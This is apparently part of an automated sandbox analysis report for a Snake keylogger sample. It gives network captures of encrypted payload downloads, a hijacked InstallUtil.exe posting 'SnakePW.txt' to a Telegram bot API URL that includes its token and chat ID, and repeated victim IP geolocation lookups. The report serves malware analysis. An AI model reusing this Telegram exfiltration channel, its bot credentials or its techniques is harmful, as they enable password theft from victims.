                                                                    2024-10-30 00:42:20 UTC8000INData Raw: 76 a3 f2 b7 c8 f9 58 89 37 00 97 b2 ed 7c 25 b6 44 55 c9 94 5f 59 7a eb 21 88 2f 89 5a 30 4d ec d1 6b ae 96 4f 44 e1 b1 50 3f 5e b8 98 1f 20 ee 92 6a 83 e3 4d 9a c2 18 9b 32 65 1f 80 33 26 bf 80 a8 4c 66 cf c4 6d 53 4d 29 5b a2 9f 57 82 a2 c2 f3 a6 fe d2 b8 fd a3 4a 8a 55 18 8c 4c d7 7b 77 08 d5 c4 e3 1f f5 66 a4 58 d1 23 c6 9b 98 5f 6d 92 60 e6 8b e6 ed fc 91 f9 17 2a 20 11 9e 7e 87 54 de 8d d5 b6 61 3a d7 ae c1 af 38 99 41 61 57 0d ac 9d 5d 5f 44 8f 49 80 83 4d d7 29 95 31 7c 29 9a bd f1 b1 17 ed 6a 4b 4b ff 82 54 6b 6a 0f 5c ab d1 41 1d ae 11 9a 27 93 23 40 3f a1 52 4b 8a 6c 8e f7 e6 db 6f a0 c9 ab 06 62 05 fc e5 09 4b d1 0a 12 fb 9e 44 89 45 f2 04 57 6f 16 9e 85 a1 a9 b2 c3 2b d7 c1 78 a9 51 b1 51 3f 2d ad 4a c6 42 70 26 42 1a 7e e7 9a 45 a8 c9 ae 84
                                                                    Data Ascii: vX7|%DU_Yz!/Z0MkODP?^ jM2e3&LfmSM)[WJUL{wfX#_m`* ~Ta:8AaW]_DIM)1|)jKKTkj\A'#@?RKlobKDEWo+xQQ?-JBp&B~E
                                                                    2024-10-30 00:42:20 UTC8000INData Raw: 2c 84 34 fd 1f 8c cd 32 f1 cc b7 a4 a2 1c d8 91 8f df fb 18 4e d5 cf ff 0d 96 a2 b4 7d af 4a 80 02 8e f9 2b 67 c8 b4 99 fc 13 b9 cc 1e 17 0b 80 79 3d fa 65 5e 63 d2 21 f4 f5 72 ad 54 c4 c3 ce 20 58 ad 47 35 93 d7 19 1d b3 7b 5d 32 8d 6a 64 82 59 07 82 d6 63 c1 7f 32 f8 57 f7 87 41 49 c2 8b c1 a2 96 78 05 7e a1 a0 f4 13 85 96 f4 ae 08 b2 b2 51 22 f8 d7 8c 34 b0 f4 50 73 93 7c b4 b8 61 9a bf 89 68 87 65 9b c3 d8 bc 20 ee 93 5a 39 c4 e2 78 85 a2 a8 dc cd b8 a1 93 02 01 66 40 d7 5a fe 91 21 7c f7 c6 e0 8a f7 42 26 5d 70 41 03 92 2b 05 ed 77 20 a4 0b fb 1f d0 00 b9 cf 69 72 07 88 3a 02 33 94 9d 5e 91 cc c0 14 d9 ee 07 98 ab d4 62 43 10 b4 b9 87 6d ea 1a 94 c2 fe 1f 80 2b 03 54 88 16 f6 8d a2 f8 1c 57 86 a8 10 34 0e 7a 6e f4 a3 37 ed 0b 1e 45 16 b3 91 a6 4e 99
                                                                    Data Ascii: ,42N}J+gy=e^c!rT XG5{]2jdYc2WAIx~Q"4Ps|ahe Z9xf@Z!|B&]pA+w ir:3^bCm+TW4zn7EN
                                                                    2024-10-30 00:42:20 UTC8000INData Raw: 17 f3 78 70 4b cf 21 80 cc db 3d e5 dd 37 50 ca e8 61 65 36 ae b7 81 3c cd 51 4d 2b 41 b5 b3 7d 18 c3 5e aa ec 84 5e e2 70 80 fa 85 0c 7f f0 e7 e0 eb 1c cd d8 55 53 0b b9 3f a7 cd 0d c2 e6 05 7a bd 27 6a f6 3e 62 12 74 7f f2 41 b5 52 30 e7 f6 57 fb d6 d3 e7 89 c0 ee 9b dd 04 f8 93 f5 c7 b9 b7 94 ee c2 c7 7a db 15 a2 83 cc 03 7b 22 1d 14 27 24 2b 62 10 ae c9 82 fb 2a 5b fb 22 87 1b 73 ec 2f 04 2b 22 96 03 63 e1 e5 39 13 07 38 a5 ab 4d fa 99 6d ed 9f f7 1b 84 fa 4d 90 e1 41 55 c6 61 54 c3 f5 04 6c 18 c8 26 5c d7 52 74 01 4f 86 54 df dd 60 56 ad 9a d1 a5 14 ba c5 33 85 cb 8c 21 d0 c6 a2 af cd c2 cc 6b 09 2f 67 7d e7 7c 67 7c bc be bc d4 92 17 28 93 87 f7 2e a1 92 00 51 39 53 89 cc 05 14 07 f9 53 42 43 40 e6 f9 c6 ac 5a 46 e2 1b 17 2d 73 10 7f 44 ea 28 db 23
                                                                    Data Ascii: xpK!=7Pae6<QM+A}^^pUS?z'j>btAR0Wz{"'$+b*["s/+"c98MmMAUaTl&\RtOT`V3!k/g}|g|(.Q9SSBC@ZF-sD(#
                                                                    2024-10-30 00:42:20 UTC8000INData Raw: 9e ee f7 75 95 83 82 2b 21 6f 74 4c 74 54 e1 e8 a5 38 89 99 d7 4f 87 9b c4 d0 c1 5c 84 42 f6 f3 66 e7 7e 8d 46 16 06 10 d2 5c 13 c0 39 f6 68 0a 4e 58 20 0d 7c 32 e8 8b 0e f0 d9 71 88 c6 7d c1 12 26 42 5c 96 5b 6b 4c 0d 3d c6 6d 61 6e f9 c9 7b 73 b8 f2 53 93 15 75 a6 06 c9 d7 38 49 29 33 67 8b 6e f1 52 72 b4 4c 05 b8 48 60 dd a1 7a 02 c8 3c eb ec d5 c4 89 b3 7b 51 38 6f de dd 12 39 b2 b7 74 98 32 15 23 e3 f7 4f ef b1 52 78 da ef 26 c5 5b 04 37 41 b4 30 fb 2b 9c ac df cb 55 5c 63 0d 34 bd 3a 5e 19 0a 28 20 52 46 a3 6f b0 63 e9 a7 ad b3 51 93 f3 98 ae 2d d6 ef 68 cc 20 ae ba 75 2d 89 2f 55 47 b7 e1 7e 83 70 96 6b c6 ae c0 76 7a 8a 0d d7 01 64 27 17 01 63 8f dc 3e 2a 72 df c4 8c e6 7d 2b 65 fb 76 34 5d 9e d4 db 0a 8d d3 a0 e3 dc 87 9a 12 d6 9e 41 c0 e7 bb 55
                                                                    Data Ascii: u+!otLtT8O\Bf~F\9hNX |2q}&B\[kL=man{sSu8I)3gnRrLH`z<{Q8o9t2#ORx&[7A0+U\c4:^( RFocQ-h u-/UG~pkvzd'c>*r}+ev4]AU
                                                                    2024-10-30 00:42:20 UTC8000INData Raw: d2 bf b1 39 2b 14 4f a9 2f a4 aa 89 fe ee 2b fa b3 50 a9 e3 e7 04 86 65 9f 52 ef 05 bc 47 66 9f b6 ef e4 7c 2f 5d 8b 4d b8 71 96 55 00 bd a2 9e 53 35 a2 15 33 12 86 d2 ad 67 d9 ea 54 3b 85 ec f9 90 26 da 66 4a ae c9 6a 08 9d 4b 80 c1 5c 96 f1 d0 fa ea 8e 66 15 d9 46 1b d5 0b 82 3d d5 b1 4a 5c 17 08 f2 67 09 d9 a8 16 25 b9 5a e8 e2 81 ed 26 97 df 51 e7 59 08 99 e9 95 c2 6f bf e8 7d 10 28 d5 be fe 0a 04 14 58 10 4c 15 27 35 70 55 e9 64 ac e4 72 7b a9 a3 1c 95 e6 46 89 7a 6f 63 11 68 25 7b b5 69 8a e5 f3 ca 5e 2f af 79 b7 41 1f e6 cf b4 66 bf 1f 25 77 de 47 e4 f3 98 27 b0 a9 44 f2 07 ea 0a 4b 79 b7 34 94 2e bc 2d 49 e0 d1 17 28 d7 c5 c8 6c 7c 76 d8 83 70 be 94 b8 3e b9 31 2c 5d 8c 13 55 70 05 ac e8 1f 58 03 44 7c a9 35 e3 9f 15 cc 13 9e c8 7d fa b5 f5 4a 49
                                                                    Data Ascii: 9+O/+PeRGf|/]MqUS53gT;&fJjK\fF=J\g%Z&QYo}(XL'5pUdr{Fzoch%{i^/yAf%wG'DKy4.-I(l|vp>1,]UpXD|5}JI
                                                                    2024-10-30 00:42:20 UTC8000INData Raw: 3d 4f 46 7e 43 70 a6 d7 95 85 82 93 46 99 db 02 82 63 4b b9 a0 f8 96 be 21 44 1b 1a 39 ab c1 c0 44 cc 8a 73 79 2b de c1 bb dc 5c d9 07 a3 fb 24 e5 13 8f a0 4d 69 67 67 e7 ba bc e6 c4 c0 5e 10 0b 80 20 6d cb 0f 50 8f 8f 0c d6 13 8c 68 d4 0a 4e ed ec 39 23 8f f4 58 32 77 77 6e 97 65 48 47 30 f4 fb 4b 90 25 29 2c 5d e4 42 2b 39 1d f1 51 bb 13 37 31 57 85 7f d9 14 c7 1e 47 20 1e 23 59 bc a8 94 43 b1 b9 91 9f 50 3f c1 00 aa 92 09 88 05 65 25 75 ba 7c c3 96 30 ac f3 c4 a4 0a af 30 af 22 ba 0d 7f 9e 10 d9 39 b4 b3 fc 4f d6 d0 4c 0f 7f f9 0a e6 2a 9d 4a ed 47 87 44 7e 7f 4e 0a 16 6b 3d 54 6b d4 8f 41 0a 0e 49 38 2a 78 15 5e 11 95 af d8 69 64 f3 50 f4 5b bb c0 bf 25 9f b4 26 74 72 cc d4 e0 18 1e 7f 9c c1 ba b8 ca 51 2c 2a 38 0e 42 32 e7 e4 94 14 99 6c 67 49 92 8f
                                                                    Data Ascii: =OF~CpFcK!D9Dsy+\$Migg^ mPhN9#X2wwneHG0K%),]B+9Q71WG #YCP?e%u|00"9OL*JGD~Nk=TkAI8*x^idP[%&trQ,*8B2lgI
                                                                    2024-10-30 00:42:20 UTC8000INData Raw: e4 d4 b5 f7 92 c1 b9 ff 53 bd 2b ec d3 9f cd 87 5d 14 2b ac 44 89 1c 01 7e 5f bb 62 32 6f b5 00 60 73 4e fd 8f 34 dc 67 c5 ff 98 15 82 d2 2f c5 d6 6d a7 bc 91 26 a2 56 72 18 26 0e ad a9 03 62 27 12 dc c2 55 38 76 06 c1 43 12 7c 8a a1 ac f3 39 f4 33 9e 0f a7 64 14 69 d2 a3 45 92 1f 85 58 22 95 57 a7 00 56 07 fa e9 74 71 cf b3 a6 d3 59 15 8f ea 19 07 43 27 13 57 25 bf 7a 7c 18 0e 30 a1 e7 30 2b c8 0c b9 33 61 9d 4f 8c c8 13 13 30 b7 ec b5 d5 ac 92 44 fe 12 d9 2a 69 13 02 af a4 b5 9c 77 9e 81 75 c1 63 c4 6e ea 19 55 bf 6d f2 22 d6 0f 75 d5 85 fa e8 b0 bc 1a 1e 41 5d b6 37 38 d5 74 47 dd 7c 6a 5a e6 ae 36 25 e4 c0 f3 05 2b 7f 2a 29 b6 54 af 8c d8 1c 3e 1f 88 62 3d 85 dc 39 00 85 0f aa 33 72 08 aa 24 28 9b 6d 86 2b 9c 67 70 b5 c3 de 5f 5d bc 44 f9 e6 bd ed 61
                                                                    Data Ascii: S+]+D~_b2o`sN4g/m&Vr&b'U8vC|93diEX"WVtqYC'W%z|00+3aO0D*iwucnUm"uA]78tG|jZ6%+*)T>b=93r$(m+gp_]Da


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.449753149.154.167.2204435544C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-30 00:42:24 UTC350OUTPOST /bot7698096781:AAGQLD6o1kzjfTe7ym-NWYz9KeQ-WUS_Q04/sendDocument?chat_id=6243598265&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8dcf9054f877039
                                                                    Host: api.telegram.org
                                                                    Content-Length: 566
                                                                    Connection: Keep-Alive
                                                                    2024-10-30 00:42:24 UTC566OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 39 30 35 34 66 38 37 37 30 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 37 32 31 36 38 30 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 39 2f 31 30 2f 32 30 32 34 20 2f 20 32 30 3a 34 32 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                                                    Data Ascii: --------------------------8dcf9054f877039Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:721680Date and Time: 29/10/2024 / 20:42:05Client IP:
                                                                    2024-10-30 00:42:24 UTC388INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Wed, 30 Oct 2024 00:42:24 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 481
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2024-10-30 00:42:24 UTC481INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 36 39 38 30 39 36 37 38 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 48 41 4d 50 50 50 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 48 41 4d 50 52 45 53 55 4c 54 42 4f 54 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 32 34 33 35 39 38 32 36 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 75 70 65 72 6e 61 74 75 72 61 6c 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 30 32 34 38 39 34 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 2c 22
                                                                    Data Ascii: {"ok":true,"result":{"message_id":409,"from":{"id":7698096781,"is_bot":true,"first_name":"CHAMPPP","username":"CHAMPRESULTBOT"},"chat":{"id":6243598265,"first_name":"Supernatural","type":"private"},"date":1730248944,"document":{"file_name":"SnakePW.txt","


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.449755188.114.97.3443600C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-30 00:42:26 UTC87OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-10-30 00:42:26 UTC883INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:26 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 359
                                                                    Connection: close
                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                    Cache-Control: max-age=31536000
                                                                    CF-Cache-Status: HIT
                                                                    Age: 56456
                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                    Accept-Ranges: bytes
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L9B3PCvoD2c5uqi9qJbCALyRCMtHUPtWCb4E0HRq2MTN92psqeO0e2GG81whNx38Y7Oula0mu51BoicZmvfqdwSE0z9w%2BDvADnxtrrNQsi0E4mkm80pjuPgaMwG%2F9fC2u34IevWd"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8da75d8aaf42e983-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1323&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2195602&cwnd=247&unsent_bytes=0&cid=446bd766f96ee539&ts=208&x=0"
                                                                    2024-10-30 00:42:26 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.449756188.114.97.3443600C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-30 00:42:27 UTC63OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    2024-10-30 00:42:27 UTC885INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:27 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 359
                                                                    Connection: close
                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                    Cache-Control: max-age=31536000
                                                                    CF-Cache-Status: HIT
                                                                    Age: 56457
                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                    Accept-Ranges: bytes
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w39CX%2B6oxYsxvFSDgn%2B6qdBHfymVlBklTEufspmH8dHNf5rVp9zBdfsSMilH8ripqEqLTBeUxVQWsm7hCxE5w%2F9AtgW9Lmr0l3jGSUKCifSFGIsMW4k3t65qYW50FQhm5H93vsOy"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8da75d909fd22ff0-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1428&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2055358&cwnd=239&unsent_bytes=0&cid=cb3c7523fa91d46f&ts=160&x=0"
                                                                    2024-10-30 00:42:27 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.449758188.114.97.3443600C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-30 00:42:28 UTC87OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-10-30 00:42:28 UTC883INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:28 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 359
                                                                    Connection: close
                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                    Cache-Control: max-age=31536000
                                                                    CF-Cache-Status: HIT
                                                                    Age: 56458
                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                    Accept-Ranges: bytes
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TWx7bjR0Dzm8fCgmCUz1NN7unOiWxu3IoTtcxzWcpcFXNkPK7SrKB7ovZznEpgoBolkJ4897ymCIPc3r5IauubuCKp%2BbvNg5GnHfw0j6EQrkR3%2B263v3AbECiRVpj4TPSZNUo1jh"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8da75d997d186c81-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1225&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2364081&cwnd=251&unsent_bytes=0&cid=1448680a0253c737&ts=152&x=0"
                                                                    2024-10-30 00:42:28 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.449760188.114.97.3443600C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-30 00:42:30 UTC87OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-10-30 00:42:30 UTC889INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:30 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 359
                                                                    Connection: close
                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                    Cache-Control: max-age=31536000
                                                                    CF-Cache-Status: HIT
                                                                    Age: 56460
                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                    Accept-Ranges: bytes
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S4h1UTXHrdxjrT1VlGnfZCa8yQcGspFClTo9IvsK%2BgqDzXVo7AGINdfy4gIAJobZ4y67mVz5DfF0BhtcjWL3OdhkSzy3CRuX8iy7xJt%2B%2BCdSf%2FbW8T55QyxfkzLsLwcVhM4essI%2B"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8da75da27e5928b1-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1470&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2036568&cwnd=251&unsent_bytes=0&cid=99603b28aa7b1100&ts=163&x=0"
                                                                    2024-10-30 00:42:30 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.449762188.114.97.3443600C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-30 00:42:31 UTC63OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    2024-10-30 00:42:31 UTC889INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:31 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 359
                                                                    Connection: close
                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                    Cache-Control: max-age=31536000
                                                                    CF-Cache-Status: HIT
                                                                    Age: 56461
                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                    Accept-Ranges: bytes
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zcVQepQcpLF0qO2IU1eTXwaC%2BHQMzpMklx83lqR%2BW%2FPEbiBSFo0einyS6l%2BlUjAWXMOuqaqBfBjzZ3fg5qdf7J8kc7E9lZa9w5IfmKGwfyir36J%2BeMqRgZBdLsNs4N7XKjhEtkAR"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8da75daba8ade962-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1151&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2296590&cwnd=251&unsent_bytes=0&cid=25e03be68e2651b3&ts=176&x=0"
